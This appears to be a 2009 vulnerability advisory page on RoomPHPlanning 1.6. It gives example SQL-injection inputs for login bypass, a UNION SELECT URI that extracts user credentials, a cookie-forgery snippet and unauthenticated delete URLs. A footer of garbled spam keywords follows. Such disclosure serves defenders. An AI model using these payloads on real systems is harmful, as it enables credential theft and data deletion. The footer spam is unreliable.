about advertise contact
Search: Home Vulnerabilities Exploits News Articles RSS Feeds Archive Talk

exploits , vulnerabilities , articles , RoomPHPlanning Multiple Vulnerabilities


Title RoomPHPlanning Multiple Vulnerabilities
Published 2009-05-26-12:00AM
Updated 2009-05-27-01:49PM
Class Input Validation Error
CVE  
Remote  Yes
Local  No
Credit  ThE g0bL!N
Vulnerable  Beaussier RoomPHPlanning 1.6
Not Vulnerable  
Code  Attackers can use a browser to exploit these issues.The following example input is available:
username:real_user' or '1=1
password:ThE g0bL!NThe following example code is available:
setcookie($cookie,$idus,time()+3600,"/");=> $cookiename=room_phplanning $idus= user_idThe following example URIs are available:(to perform SQL-injection attacks)
http://www.example.com/admin/userform.php?id=-1+union+select+1,concat(LoginUs,0x3a,PwdUs),3+FROM+rp_user+where%20IdUs=1--(to delete rooms and users)
http://www.example.com/rp_1.6/rp_1.6/admin/delitem.php?room=$room id
http://www.example.com/rp_1.6/rp_1.6/admin/delitem.php?room=1
http://www.example.com/rp_1.6/rp_1.6/admin/delitem.php?user=user id
TXT  t3xt 1t!


Advertising

Copyright 2007, SecurityDot
Fri, 11 Dec 2009 17:55:49 +0000

Friends : milw0rm.com , secunia.com , securityfocus.com
GOOGLE
NEWS EXPLOITS VULNS
exploits , 0day exploits , newest exploits , vulnerabilities , newest vulnerabilities , 0day vulnerabilities , newest articles , linux articles , articles
vedio sxs www.18to19 phpBB by p news for c www.zzoldp d...fx29id www.trish news+for+c d...2Fid.t localhost Trisha bat www.zznank aida yespi free sex v Adult girl 200 /compo www.jc361d xxx clips www.zzlzy. www.yuanzh 554 200 /compo 200 /compo virtual ma www.zzloup www.futrip G....es/te raidphp shop646.va www.zzlmg. Gambar gad Crack+Data news for C www.80845. admin%2Fse php-nuke 2 lo129l www.80845. vedio sxs www.zzhew. 200 /compo Apache/1.3 www.zzhedu news for C hritik wal ps_store pure sex Crack Data www.zzgsof www.auto26